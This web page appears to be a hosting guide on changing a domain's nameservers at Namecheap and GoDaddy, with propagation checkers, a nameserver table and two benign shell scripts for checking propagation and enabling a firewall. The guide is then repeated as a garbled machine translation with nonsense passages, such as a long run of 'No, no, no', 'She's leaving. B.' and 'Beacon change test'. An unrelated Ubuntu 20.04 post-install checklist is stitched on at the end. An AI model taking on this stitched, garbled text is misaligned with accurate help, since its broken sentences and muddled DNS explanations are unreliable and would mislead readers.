Changing nameservers can also be done through IP addresses. In this case you need to have access to a DNS management section.
When you sign up for a hosting plan, the web host usually sends you an email afterwards with the server’s IP. Once you have the IP address, go to your domain name provider and change the Host (A) Record within the DNS settings to reflect the new IP address. It will take an hour or two, depending on what the TTL (Time-To-Live) is pre-set to.
I won’t be describing this option for the time being as it is not that frequent. It is used, for example, for GoDaddy web hosting when using a non-GoDaddy domain (meaning the domain not registered at GoDaddy).

Already know how to update the nameservers? Looking for the specific nameservers records used by popular web hosts? Well, some of them can only be found directly at your web hosting providers. Nevertheless, you might still find a few useful settings, just skip to the >> Nameservers of Well-Known Web Hosts << section below.

What Do I Need to Make Nameservers Work?

All you need is love😉. But besides that: the Domain Name and Web Hosting!
I assume that you know How to Register a Domain Name or that you already have one. No harm done if you are not familiar with that. Just read on.
To make your domain “work” with your website you obviously need a web hosting service. Don’t have one yet? Reading this “Choose Your Web Host” guide will help you to find it.
Most hosting companies will send you an email with relevant hosting information, including your name servers that you will need. Just check your email-box, it will be (most likely) a part of the common “Welcome-to-Your-Host” e-mail. If not, the web host support will certainly have that information ready for you.

Note, you don’t have to worry about setting up the nameservers if you got your domain directly at your web hosting provider. In that case the web host sets the domain nameservers for you. A few good web hosts where you can get a free domain name with your hosting package:

Disclosure: We only review products and services that we believe will add value to our readers. Some of the links in this post are “affiliate links” from which we may earn commissions. Note: there is no additional cost to you! You’ll find more details on our Disclosure page. Thank you for your support!

If you already have your domain and web hosting, skip to the >> Set Up Nameservers
Or go directly to the Namecheap or GoDaddy ‘set up nameservers’ guides if your domain is at the respective registrar.

Obtain a Domain Name If You Don’t Have One

First off, the domain is going to have to be purchased from a registrar and have the nameservers set to your web hosting space of choice. Yes, the nameservers’ setup will be done at your domain registrar, not at web hosting provider (unless the domain is registered directly at the web host).
A domain registrar is a company or organization that provides domain registration services to businesses or individuals who want to have a specific domain name or web address.

Domain Registrar

Domain names also have what is called a TLD (Top level domain or domain extension). Most commonly used are .com, .net, .org, .edu, and .me. There are several others that are not so popular. The list goes on for special country code TLD’s as well, to list a few: .us, .ca, .co.uk, com.au, .fr, .de, .my or .in.
New domain extensions (called “donuts”) like .xyz, .dating, .media, .zone, .shop, .pizza or .boutique are going to cost a bit more than the common .net or .com domains.
You’ll get an idea by browsing the above registrars and searching for your new domain.

Questions About Domains and Nameservers

Three most common questions asked:

Q: Do I need to know the web hosting nameservers before registering my domain?
A: No, not needed. Normally, first you just register your domain. Then you sign up for your chosen web hosting service. The web host will provide you with the nameservers for your domain.
Q: Do domain registrars charge any additional fees for custom nameservers?
A: Nope. No additional fees should be charged. If you bump into a domain registrar that does that, run away. The domain registration fee covers the Nameservers as they are the core part of domain name operations.
Q: How often can I change or update the nameservers?
A: As often as you need to. Just be aware that for changes to become fully functional you have to wait up to 48 hours (usually they work within 24 hours).

Setting Up Nameservers

Once you have thought about the name of your domain and have paid for the domain you chose, you will then need to set the nameservers of this domain. Depending on where you buy your domain, the process of changing the nameservers can be different.

By now, you should have/know:

  • The Nameservers Information for your domain. Normally, hosting companies will send you an email with your server space details.
  • Domain Registrar Access (e-mail/password). Most registrars will have you fill in “Account Details” (including your username and password) so you can log in and manage your new domain.

Every hosting company has pre-set nameservers for their hosting packages.
If you have purchased a shared hosting platform together with your domain (you have probably got a free domain deal), then the domain nameservers should already be set up and you won’t have to worry about any settings.

Most of you have probably registered your domain with one of the popular domain companies. Now, you would like to “attach” your domain to your website. How do you do that? Just start pointing your domain to where your website is hosted!

All you need to do is change the nameservers and wait the appropriate propagation times. Sounds easy, right? Sometimes it’s not so straightforward. To get your nameservers changed, you will want to log into your registrar and navigate to the DNS or Nameserver section in your account.

To make it easier to understand, we will explain this setup process individually for each of these two most popular domain registrars:

I believe these two examples should be sufficient to demonstrate the nameservers set-up process. Changing nameservers at other domain registrars is quite similar. The procedure always goes through “Manage DNS” or “Custom Nameservers” sections where you can make your updates and set up new nameservers.
In the ‘worst case scenario’😵, bear in mind that you can always get help from your domain service or web hosting providers.

Change Namecheap Nameservers

Let’s deal with the case when you need to change or modify nameservers at the Namecheap domain registrar. As a reminder, this scenario only applies when you don’t have a web hosting service with Namecheap, only your registered domain.

  1. Go to namecheap.com. Log into your Namecheap account (enter your username, password).
     Screenshot 1: Sign-In | Namecheap Nameservers
  2. Right after signing in you’ll see your “Dashboard”. Select the domain you want to change the nameservers for.
     Screenshot 2: Dashboard | Namecheap Nameservers
  3. Scroll down a bit, locate the DNS Management Section with a drop-down menu. There will be 3 options to select from: “Namecheap BasicDNS”, “Namecheap Web Hosting DNS” and “Custom DNS”. Select the Custom DNS item. Refer to the screenshot below.
     Screenshot 3: Custom Nameservers | Namecheap DNS

As you can see, in the “Custom DNS” settings we have our Siteground hosting nameservers. Of course, if we move to another web host, the nameservers will change. We are satisfied with Siteground, still, in the future, no-one knows, we might consider another hosting provider (as part of our ongoing “web hosting” journey 😉). The takeout: your website can be moved to any web hosting company, all you need is to update the nameservers accordingly!
Not to forget, the nameserver change is not going to happen “instantly”. The propagation time can vary depending on many network factors.

Change GoDaddy Nameservers

You are going to modify your GoDaddy domain’s nameservers to have them point to your web hosting provider, provided that your web hosting is not GoDaddy.

  1. Go to godaddy.com. Sign into your GoDaddy domain account (Domain Control Center). Follow the screenshots below. I don’t think they are all necessary, but some beginners like to see it in layman’s perspective.
     Screenshot 1a: Sign-In | GoDaddy Domain
     Screenshot 1b: Sign-In Box | GoDaddy Domain Account
  2. You will be brought to the “My Products” screen, which lists your domain names and other products you may have. Pick the domain you need to make the nameserver updates to. Click on the “Manage” button to proceed to the “Settings” page. Scroll down to the “Additional Settings” block. Here you’ll find the “Manage DNS” link that will take you to the “DNS Management” panel. In the “DNS Management” panel, scroll down to the “Nameservers” section.
     If your domain uses GoDaddy’s nameservers you will see various DNS entries in the Records panel. You don’t have to worry about them now.
     By default, your domain will have GoDaddy’s nameservers, something like ns71.domaincontrol.com and ns72.domaincontrol.com (or any ns’NumberNumber’.domaincontrol.com records).
     Screenshot 2a: Domain List | GoDaddy Account
     Screenshot 2b: Additional Settings Links | GoDaddy
     Screenshot 2c: DNS Management | GoDaddy Nameservers
  3. Next to “Using default nameservers”, click on the “Change” button.
     You’ll get to the next screen, “Connect My Domain to a Website”. Click on the link below, “Enter my own nameservers (advanced)”.
     In the ‘Choose Your Nameservers’ form enter the custom nameservers of your web host or web service. If you need more lines/boxes use the ‘Add Nameservers’ button (down-right). Then save your changes!
     Right after the changes you will see a notification about the update being in process. Note, at this point you will still see the ‘Records’ panel with various default data. But after refreshing the page (or after a couple of minutes) the records will be unavailable: “We can’t display your DNS information because your nameservers aren’t managed by us”.
     Done and done! Now you have to wait for the new nameservers to be processed.
     Screenshot 3a: Connect Your Domain to a Website | GoDaddy Nameservers
     Screenshot 3b: Set Your Own Nameservers | GoDaddy
     Screenshot 3c: Nameservers Notification After the Update | GoDaddy
     Screenshot 3d: Custom Nameservers Updated | GoDaddy

In our GoDaddy “Custom Nameservers” screenshot we use the Bluehost nameservers. Yes, we have another small website at Bluehost. We carry out a wide range of tests to get a better picture of their services. So don’t forget to enter your web host nameservers in there!

Nameservers Propagation

After the nameserver change, a network background process called propagation occurs. Propagation of a DNS change such as new nameservers generally takes around 24 hours for all web traffic to start seeing the content of your website (based on my experience, usually it is no more than 12 hours). In some cases it could take up to 48 hours. For any longer propagation time you need to contact the registrar and/or your web hosting company.
There are several good websites you can use to check if your domain is propagated to your new server or not. I bring this up because propagation seems to be where most of the confusion comes from. If you are like me when I started, I had no idea what DNS or nameservers even were.

Checking the Propagation Change

Dnschecker.org: DNSchecker allows you to put in your domain name and check different DNS records and if they have propagated to different areas around the world. What you are looking for is NS in the dropdown.

Viewdns.info: ViewDNS has several different tools available to use to check different things, but what you are looking for is the “DNS propagation checker tool” which you can search for domains to check propagation with.

Whatsmydns.net: WhatsmyDNS offers the same thing that DNSchecker.org offers. You get the ability to search a domain and different types of dns records. Again, what you are looking for is NS in the dropdown next to the search.

Site24x7.com: When you first land on this website, it can look intimidating. If you click “Tools” at the top, you can either wait for the banner to change to “DNS Analysis of your Domain” or click on “Check Website Availability” from the list of Server Administrator Tools.
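
The check those sites perform can also be done from a terminal. This added example (not part of the original guide) classifies the NS answers returned by several resolvers as old, new or unexpected; the resolver answers are constructed sample data, the old and new sets reuse the GoDaddy and Bluehost nameservers mentioned in this guide, and the function names are hypothetical.

```bash
#!/usr/bin/env bash
# Added example: track a nameserver change across several resolvers.

export LC_ALL=C   # stable sort order when comparing nameserver sets

# normalize_ns: NS names on stdin -> lowercase, no trailing dot, sorted, space-joined.
normalize_ns() {
    tr 'A-Z' 'a-z' | tr -s ' \t' '\n' | sed -e 's/\.$//' -e '/^$/d' \
        | sort -u | paste -s -d ' ' -
}

# classify_ns OLD NEW ANSWER: print new | old | no-answer | unexpected.
# "unexpected" means the answer matches neither the registrar's old set nor the
# web host's new set, e.g. a typo in the registrar form or a change you did not make.
classify_ns() {
    local old new got
    old=$(printf '%s\n' "$1" | normalize_ns)
    new=$(printf '%s\n' "$2" | normalize_ns)
    got=$(printf '%s\n' "$3" | normalize_ns)
    if [ -z "$got" ]; then echo "no-answer"
    elif [ "$got" = "$new" ]; then echo "new"
    elif [ "$got" = "$old" ]; then echo "old"
    else echo "unexpected"
    fi
}

# query_ns DOMAIN RESOLVER: live lookup (needs network access and the dig tool).
# Feed the report with: printf '%s %s\n' "$r" "$(query_ns "$domain" "$r")"
query_ns() {
    dig +short NS "$1" "@$2" | paste -s -d ' ' -
}

# propagation_report OLD NEW: reads "resolver answer..." lines on stdin.
#   returns 0: every resolver returns the new set
#   returns 1: still propagating (old or missing answers remain)
#   returns 2: at least one resolver returned an unexpected set
propagation_report() {
    local old="$1" new="$2" resolver answer status total=0 on_new=0 unexpected=0
    while read -r resolver answer; do
        [ -n "$resolver" ] || continue
        status=$(classify_ns "$old" "$new" "$answer")
        printf '%-10s %s\n' "$resolver" "$status"
        total=$((total + 1))
        case "$status" in
            new) on_new=$((on_new + 1)) ;;
            unexpected) unexpected=$((unexpected + 1)) ;;
        esac
    done
    echo "summary: $on_new/$total resolvers return the new nameservers"
    [ "$unexpected" -eq 0 ] || return 2
    [ "$on_new" -eq "$total" ] || return 1
    return 0
}

# Demo: registrar defaults (old) and web host nameservers (new) as named in the guide.
OLD_NS="ns71.domaincontrol.com ns72.domaincontrol.com"
NEW_NS="ns1.bluehost.com ns2.bluehost.com"

# Constructed answers, in the shape "resolver name name ..." (not real lookups).
rc=0
propagation_report "$OLD_NS" "$NEW_NS" <<'EOF' || rc=$?
8.8.8.8 ns1.bluehost.com. ns2.bluehost.com.
1.1.1.1 ns72.domaincontrol.com. ns71.domaincontrol.com.
9.9.9.9 NS2.BLUEHOST.COM. ns1.bluehost.com.
EOF
echo "exit status: $rc"
```

An “old” result during the first day or two is ordinary propagation; an “unexpected” result is the one to act on, by re-checking the nameserver fields at the registrar against the values your web host sent you.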

Nameservers of Popular Web Hosts

Lost your web host’s welcome email with nameservers instructions? You should always try to get the most up-to-date nameservers information directly at your web host website or from their support.
The list below hasn’t been fully tested and some nameservers do depend on the web hosting plan you have purchased. It is impossible to list all the nameservers, but you can at least check the nameserver formats, segments and samples.

Setting up name servers for your domain name

A little bit about nameservers

Name servers (the old ones use name servers) are part of the Domain Name Server (DNS) entries. The DNS consists of name, name and mail routing records, also called MX records. Name servers process web requests for your domain. Basically, they tell your web browser where to go to transfer information to your computer via the Internet.

When you enter your domain in your browser, you will probably see a parking page (hosted by your domain registrar) by default. This means that the registrar uses his own name servers. You can update the nameservers with the nameservers of your hosting provider.

At this point, we will consider registering and configuring your domain to interact with the server space of your hosting. This domain<->website is connected via nameservers. Each domain must have name server entries to be available on the Internet.
Name servers often exist in pairs and are supported by IP addresses. See this sample form for a demonstration:

  • ns1.bluehost.com, 162.88.60.37
  • ns2.bluehost.com, 162.88.61.37

When changing the name server at a domain provider, normally only the first part of the name is used: ns1.bluehost.com and ns2.bluehost.com.

Name servers can also be changed using IP addresses. In this case, you must have access to the DNS management area.
When you subscribe to a hosting package, the hosting provider usually sends you an email with the server’s IP address. Once you have an IP address, go to your domain name provider and change the Host (A) record in your DNS settings to reflect the new IP address. This takes one or two hours, depending on what the TTL (time-to-live) is set.
For the time being, I won’t describe this option because it’s not very common. She’s leaving. B. used for GoDaddy web hosting if a non-GoDaddy domain (i.e. a domain which is not registered with GoDaddy) is used.

Already know how to update nameservers? Are you looking for specific name server entries used by popular web hosts? Some are only available directly from your hosting providers. However, you can still find some useful settings, go to the section >> Known Hostname Servers << below.

What do I need to run the nameservers?

All you need is love. But other than that: Domain name and web hosting!
I assume you know how to register a domain name or what you already have. It can’t hurt not knowing him. Keep reading.
In order for your domain to work with your website, you will of course need web hosting. Don’t you have one yet? If you read this guide Choose a Hosting Provider and you will find it.
Most hosting companies will send you an email with relevant hosting information, including your servers with the names you need. Just check your email inbox, it will (probably) be part of your general greeting of the email. Otherwise, host support will keep this information securely available for you.

Please note that you do not have to worry about setting up name servers if you have received your domain directly from your hosting provider. In this case, the hosting provider will install the domain name server for you. Several good web hosts where you can get a free domain name with your hosting package

Disclosure: We only consider products and services that we believe will benefit our readers. Some of the links in this post are affiliate links that allow us to earn commissions. Pay attention: There are no extra costs for you! For more information, please visit our Disclosure page. Thank you very much for your support!

If you already have your domain and web hosting, go to >> Configure Name Server
or go directly to Configure Name Server or GoDaddy name server if your domain is with the right registrars.

Determine the domain name if you do not have

First of all, the domain must be purchased from the registry and the nameservers must be installed on the hosting space of your choice. Yes, the name servers are installed in your domain name registry, not at your hosting provider (unless the domain is registered directly with a web host).
A domain registrar is a company or organisation that provides domain registration services to companies or individuals who want a specific domain name or a specific web address.

Domain Registrar

Domain names also have a TLD (top-level domain or domain extension). The most commonly used are .com, .net, .org, .edu and .me. There are a few others that are not so popular. The list continues for specific country TLD codes, to name a few: .us, .ca, .co.uk, com.au, .fr, .de, .my or .in.
New domain extensions (called donuts) such as .xyz, .dating, .media, .zone, .shop, .pizza or .boutique will cost a little more than normal .net or .com domains.
You can get an overview by searching between the above registrars and searching for a new domain.

Domain and name server issuance

The three most frequently asked questions:

Q : Do I need to know the hosting name servers before I can register a domain?

A : No, you don’t. Normally all you have to do is register your domain first. Then sign up for the web hosting service of your choice. The webhost provides you with name servers for your domain.

Q : Do domain registrars charge extra fees for name server services?

A : No, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no. No, no, no, no, no, no, no, no, no. There’s no extra charge. If you run into a domain registrar who does this, walk away. Domain registration fees apply to name servers, as they account for a large proportion of domain name transactions.

Q : How often can I change or update the nameservers?

A : As many times as necessary. Please note that you will have to wait up to 48 hours for the changes to be fully functional (they usually work for 24 hours).

Name server configuration

After you have thought about your domain name and paid for the chosen domain, you need to install name servers for that domain. Depending on where you purchase your domain, the process of changing the name servers may be different.

You should know by now:

  • Name server information for your domain. Usually hosting companies send you an e-mail with detailed information about the location of your server.
  • Access to the registrar of the domain (email/password). Most registrars will ask you to fill in your account details (including username and password) so that you can log in and manage your new domain.

Each hosting company has pre-installed name servers for its hosting packages.
If you purchased a shared hosting platform with your domain (you probably have a free domain offer), the nameservers should already be configured and you don’t have to worry about the settings.

Most of you have probably registered your domain with one of the popular domain companies. Now you want to link your domain to your website. Is that what you’re doing? Just start by pointing out your domain where your website is located!

Just change the nameservers and wait for the correct execution time. Sounds easy, doesn’t it? Sometimes it’s not that easy. To change your name servers, log in to the registry and go to the DNS or nameserver section of your account.

For better understanding, we explain this configuration process separately for each of these two most popular domain registrars:

I think these two examples should be enough to show how nameservers are configured. Changing name servers with other domain registries is very similar. The procedure always goes through the DNS administration or Name Servers sections, where you can perform your updates and configure new name servers.
In the worst case, remember that you can always get help from the domain service or web hosting provider.

Changing the name server name stack

Let’s take a case where you need to change or modify the registry’s name servers for high-quality domains. Again: This script is only valid if you do not have webhosting namechaep, but only your registered domain.

  1. Go to namecheap.com. Log in to your Namecheap account (enter username and password)

Namecheap registration | Home page

1. Login | Name servers

  1. Once registered, you’ll see your dashboard. Select the domain for which you want to change the name servers (click on the image below to see it in a window).

Select the domain - NameBillig 2. Dashboard | Cheap name servers

  1. Scroll down a bit and find the DNS management section using the drop-down menu. There will be 3 options to choose from: Namecheap BasicDNS, Namecheap Web Hosting DNS and Custom DNS. Touch custom DNS. See the screenshot below.

Username Servers - naming convention 3. User-defined name servers | Name sharing DNS

As you can see in the custom DNS settings, we have our hosting name servers for Siteground. Of course, if we change hosts, the nameservers will change as well. We are happy with Siteground, but in the future, no one knows, we might consider another hosting provider (within our current web hosting plans). Export : Your website can be transferred to any host, just update the nameservers!
Don’t forget that changing the nameservers doesn’t happen immediately. Delivery times may vary depending on many network factors.

GoDaddyChange the name of the server

You change the GoDaddy nameservers to refer to your hosting provider. Of course, your web hosting isn’t Godaddy.

  1. Go to godaddy.com. Log in to a GoDaddy domain account (Domain Control Center). Follow the screenshots below. I don’t think they’re all necessary, but some newcomers like to see things from an amateur perspective.

Request GoDaddy 1a. Login | GoDaddy Domain

GoDaddy login page

1b. Login | GoDaddy Domain Account

  1. The My Products screen appears with a list of your domain names and other products you may own. Select the domain to which you want to update the nameservers. Click the Manage button to go to the settings page. Go to the Advanced Settings field. Here you will find the link Manage DNS, which will take you to the Manage DNS panel. In the DNS management window area, scroll down to the name server area.
    If your domain uses Godaddy name servers, you will see several DNS records in the Records section. You don’t have to worry about that now.
    By default, your domain has GoDady name servers such as ns71.domaincontrol.com and ns72.domaincontrol.com (or an ns NumberNumber.domaincontrol.com entry).

List of GoDaddy domains 2a. List of domains | GoDaddy account

GoDaddy 2b Advanced settings. Advanced Settings Link to GoDaddy

GoDaddy DNS administration

2c. DNS management | GoDaddy nameserver

  1. Click the Edit button next to Default name server usage.
    You will be redirected to the following screen Connect my domain to the website. Click on the link Enter your own (extended) name servers below.
    In the Select Your Name Servers form, enter the custom name servers for your host or web service. If you need more lines/boxes, use the Ad Nameserver button (bottom right). So save your changes!
    As soon as you change it, you will see a message that the update is in progress. Note that at this point you can still see the Records panel with different standard data. But after refreshing the page (or after a few minutes) the recordings are no longer available: We cannot display your DNS data because your name servers are not managed by us.
    Let’s go, let’s go, let’s go, let’s go! You now have to wait until the new nameservers are processed.

Defining the GoDaddy name server

3a. Connect your domain to GoDaddy’s name servers.

Defining the GoDaddy name server

3b. Define your own nameservers | GoDaddy

Update GoDaddy name server information

3c. Name server notification after update | GoDaddy

Name server changes processed by GoDaddy

3d. Update custom name servers | GoDaddy

In the screenshot of GoDaddy Custom Nameservers we use Bluehost nameservers. Yeah, we still have a little website in Bluehost. We carry out a wide range of tests to get a better picture of their services. So don’t forget to enter your nameservers there!

Distribution of name servers

After changing the name server, a network background process called propagation takes place. As with name servers, DNS propagation changes usually take about 24 hours before all web traffic starts to see the content of your website (in my experience, this usually takes no more than 12 hours). In some cases this can take up to 48 hours. For more information, please contact the registry and/or your host company.
There are a number of good websites you can use to check whether or not your domain is spreading to your new server. I bring it up because that’s where the confusion seems to be at its greatest. If you are like me when I started, I had absolutely no idea what DNS or name servers looked like.

Beacon change test

Dnschecker.org : With DNSchecker you can add several DNS records to your domain name and check whether they have spread to different parts of the world. What you are looking for is NA on a drop-down list.

Viewdns.info: ViewDNS has several tools that you can use to check different things, but what you are looking for is a DNS propagation verification tool that allows you to search for domains to check propagation.

Whatsmydns.net: WatsmyDNS offers the same as DNSchecker.org. You can search by subject and by different types of documents dns. Again, search for an NS in the drop-down list next to the search query.

Site24x7.com The first time you land on this site, it might seem scary. If you click on Tools above, you can either wait for the banner to go through the DNS scan for your domain, or click on Check Site Availability in the list of server administrators.


Name servers of popular web hosts

Have you lost your hosting provider’s welcome email with the name server instructions? You should always try to get the latest name server information directly from your host’s own site or from their support.
The list below is not fully tested, and some name servers depend on the hosting package you purchased. It is impossible to list all name servers, but you can at least check the formats, patterns and samples of the name servers.

| Web host | Name servers |
| --- | --- |
| Bluehost | General: ns1.bluehost.com, ns2.bluehost.com. Resellers: ns1.rhostbh.com, ns2.rhostbh.com |
| GoDaddy | *Example: ns72.domaincontrol.com, ns73.domaincontrol.com. Can take the form nsNN.domaincontrol.com (N is a digit) |
| DreamHost | ns1.dreamhost.com, ns2.dreamhost.com, ns3.dreamhost.com |
| InMotion | ns1.inmotionhosting.com, ns2.inmotionhosting.com. Reseller: ns1.servconfig.com, ns1.servconfig.com |
| SiteGround | *Sample: ns1.us46.siteground.us, ns2.us46.siteground.us. For US hosting. Can take the form ns1-2.usNN.siteground.us |
| HostGator | *Example: ns8430.hostgator.com, ns8431.hostgator.com. Can take the form nsNNNN.hostgator.com |
| A2Hosting | ns1.a2hosting.com, ns3.a2hosting.com, ns4.a2hosting.com |
| BigScoots | ns1.bigscoots.com, ns2.bigscoots.com |
| HostPapa | ns1.hostpapa.com, ns2.hostpapa.com |
| Namecheap | dns1.namecheaphosting.com, dns2.namecheaphosting.com |
| WebHostingPad | ns5.webhostingpad.com, ns6.webhostingpad.com (or any other ns number) |


Top 14 Things to Do After Ubuntu 20.04 LTS Installation

On April 23, 2020, Canonical released the long-awaited Ubuntu 20.04. The latest release replaces its predecessor, Ubuntu 18.04 LTS, and comes with a stylish new desktop theme, an improved look, the Linux 5.4 kernel, ZFS file system support and tons of hardware and software improvements. Ubuntu 20.04 is a Long Term Support (LTS) version and will be supported like any other LTS version for 5 years until 2025.

After you have installed Ubuntu 20.04 LTS on your system, here are some of the 14 best things to consider before using your system fully.

1) Install the latest package updates

After installing a new Linux system it is always a good idea to update the package lists and the installed packages. This brings the system up to date with the latest packages and security updates. To update the system and its packages, execute the command:

~$ sudo apt update && sudo apt upgrade -y

2) Adjust appearance/look and feel

Since the release of Ubuntu 18.10, the default Ubuntu theme has been the elegant and neat Yaru. This time, the Canonical team stepped up its efforts and shipped 3 variants of the Yaru theme with a set of polished icons. The Yaru variants are light, standard and dark. By default Ubuntu 20.04 LTS uses the standard variant of the Yaru theme.

You can also switch to the dark variant of the theme.

Ubuntu 20.04 also ships with additional background images that you can use to add a touch of color and improve the appearance of your desktop.

In addition to switching between themes and backgrounds, users can adjust the dock settings and increase the size of the icons.

3) Installation of the GNOME Tweaks tool

GNOME Tweaks, commonly referred to as the GNOME Tweak tool, is a free configuration tool that gives you more flexibility to further customize the appearance of the GNOME desktop, shell extensions, windowing and performance settings, to name but a few.

To install GNOME Tweaks, run the command:

~$ sudo apt install gnome-tweak-tool -y

4) Installation of multimedia codecs for playback of MPEG4 and other multimedia files.

By default, Ubuntu 20.04 LTS, like previous versions, does not support playback of multimedia files such as MPEG4 and AVI. If you want to play such media files, you need to install the ubuntu-restricted-extras package. It bundles essential software such as media codecs, Adobe Flash and GStreamer. To install the Ubuntu restricted extras package, run the command below:

~$ sudo apt install ubuntu-restricted-extras -y

On the EULA screen, use the Tab key to select Ok and press ENTER.

On the next screen, select Yes to accept the terms of the license. The system will then start installing the Ubuntu restricted extras package.

5) Firewall activation and configuration (ufw)

The firewall (ufw) is installed automatically when you install Ubuntu 20.04 LTS, but it is disabled by default, so it must be enabled to protect the system.

~$ sudo ufw status
Status: inactive
~$

Run the following command to activate the firewall,

~$ sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
~$
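The SSH warning above matters on machines you administer remotely. The script below is an added example, not part of the original article: it builds a default-deny ufw baseline and, when run from an SSH session, allows the SSH port before the firewall is enabled. The function names and the APPLY switch are assumptions of this example; it only prints the commands unless APPLY=1 is set.

```shell
#!/bin/sh
# Added example (not from the original article): enable ufw with a
# default-deny baseline without cutting off the SSH session you are using.
# Function names and the APPLY switch are assumptions of this example.

# Print the ordered ufw commands. SSH_CONNECTION is set by sshd as
# "client_ip client_port server_ip server_port".
ufw_plan() {
    echo "ufw default deny incoming"
    echo "ufw default allow outgoing"
    if [ -n "${SSH_CONNECTION:-}" ]; then
        port=${SSH_CONNECTION##* }            # last field = server port
        case $port in ''|*[!0-9]*) port=22 ;; esac
        # "limit" allows the port but rate-limits repeated connections
        echo "ufw limit ${port}/tcp"
    fi
    echo "ufw --force enable"                 # --force skips the y|n prompt
}

# Succeeds if the text passed in (output of "ufw status") says active.
ufw_is_active() {
    printf '%s\n' "$1" | grep -q '^Status: active'
}

# Dry run unless APPLY=1: print each command, or execute it with sudo.
ufw_apply() {
    ufw_plan | while read -r cmd; do
        if [ "${APPLY:-0}" = 1 ]; then
            sudo $cmd </dev/null
        else
            echo "would run: sudo $cmd"
        fi
    done
}

ufw_apply
```

After applying, `sudo ufw status verbose` shows the default policies and the SSH rule.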

6) Install Synaptic Package Manager.

Install the Synaptic package management tool, which provides a graphical interface for package management. Run the command below to install Synaptic,

~$ sudo apt install synaptic -y

Once it is installed, we can access it by searching for Synaptic from the dash,

7) Set up your email client

Keeping up with email is a top priority for most users. Of course e-mail is accessible via a web browser, but Linux and especially Ubuntu 20.04 have made working with e-mail easier through e-mail clients such as the bundled Thunderbird.  You can easily follow the instructions to add an email account to your Thunderbird mail program to receive and send emails. If you don’t like Thunderbird, there are other options you can install, such as Evolution.

8) Set up Timeshift (backup tool)

Backing up is one of the most important tasks that every Linux user must remember. Things may not go the way you expect, and when they do not, your system could crash fatally, resulting in the loss of valuable data. All it takes is one wrong command to make your system fail. To prepare for the worst case scenario, it is always wise to have a system backup. Timeshift is an open source application that allows Linux users to create a system restore point to which they can return if something goes wrong.

Timeshift takes incremental snapshots of the entire operating system, including the home directory, settings, and system configuration. In case of a problem, you can restore your system to a working state.

You can install Timeshift by adding the Timeshift PPA as shown below:

~$ sudo apt-add-repository -y ppa:teejee2008/ppa

The package lists must then be updated so that apt picks up the Timeshift PPA.

~$ sudo apt update

And finally, install Timeshift with the command:

~$ sudo apt install timeshift -y

9) Installation of required software applications

Although Ubuntu 20.04 LTS comes with all the basic applications you need, some may not have all the capabilities you need to perform certain tasks. For example, some video formats may not work properly because some video codecs are missing.

Fortunately, there are many other multifunctional, open and free applications that extend the functionality of standard applications and provide a better user experience.  Below is a brief description of some of the applications you can install on your system.

  • VLC Media Player: A very popular multifunctional video and audio player.
  • Google Chrome: A widely used multifunctional web browser with many functions and features.
  • GIMP: Free and open source photo editor that can perform many tasks such as photo editing, taking screenshots, free form drawing and more complex graphical editing tasks.
  • Flameshot: A free and powerful tool for capturing the screen.
  • VirtualBox: A free and open source virtualization platform for creating and running virtual machines.
  • Skype: A free communication tool with which we can make online audio and video calls.
  • FileZilla: A free and open source ftp and sftp client that allows files to be transferred between the ftp/sftp client and the server using the ftp and scp protocols.

An easy way to install these applications is by using the good old Ubuntu Software Center. The applications are divided into several main categories to help you navigate and install the selected applications:

  • Audio and video
  • Communication and news
  • Games
  • Productivity
  • Graphic design and photography
  • Additions


10) Installation of GNOME Shell extensions

GNOME Shell extensions are small pieces of code that allow you to customize your desktop and extend the functionality of the GNOME desktop. A popular GNOME extension is OpenWeather, which shows the weather for a chosen location when you click on it.

To install the GNOME Shell extensions, use the following commands,

~$ sudo apt install gnome-shell-extensions -y

Now open a web browser, add the GNOME Shell integration add-on, then go back to the terminal and run the command below,

~$ sudo apt install chrome-gnome-shell -y

Go back to the web browser, click GNOME Shell Extensions and then click the OpenWeather extension,

Turn it on,

Once it is turned on, the OpenWeather applet is visible in the top bar; now set your current location.

11) Setting up Google Drive using online accounts.

Thanks to the online accounts feature in Ubuntu 20.04 LTS we can easily configure our Google Drive,

Go to Settings -> Online Accounts -> select Google.

Enter your Gmail ID and follow the on-screen instructions to complete the setup.

12) Activating Night Light

If we use the Ubuntu system at night, it is advisable to switch on Night Light to reduce the strain on the eyes. To activate Night Light mode, go to Settings -> Display on screen.

13) Look what’s new.

Ubuntu 20.04 brings a fresh take on the Yaru theme, which was introduced in Ubuntu 18.10. You’ll also get the new GNOME 3.36 desktop environment with polished icons and buttons and a more aesthetic look. The new desktop environment also has a new dark theme.  You also get fractional scaling, which supports high-resolution screens and monitors.

In addition, you can use the latest versions of software applications such as :

  • Firefox 75.0
  • LibreOffice 6.4.3
  • Thunderbird 68.7

14) Install Windows software and games with PlayOnLinux.

Wine is an open source application that makes it possible to run Windows applications on Linux. PlayOnLinux is a graphical front end for Wine. With Wine and PlayOnLinux you can run applications that otherwise would not work on Linux, such as games and Adobe Photoshop.

To install PlayOnLinux together with Wine, run the apt command below,

~$ sudo apt install playonlinux -y

This concludes our top 14 things to do after installing the new Ubuntu 20.04 LTS. It is expected that the latest version of Ubuntu will be highly appreciated by most Ubuntu fans for its popularity and ease of use.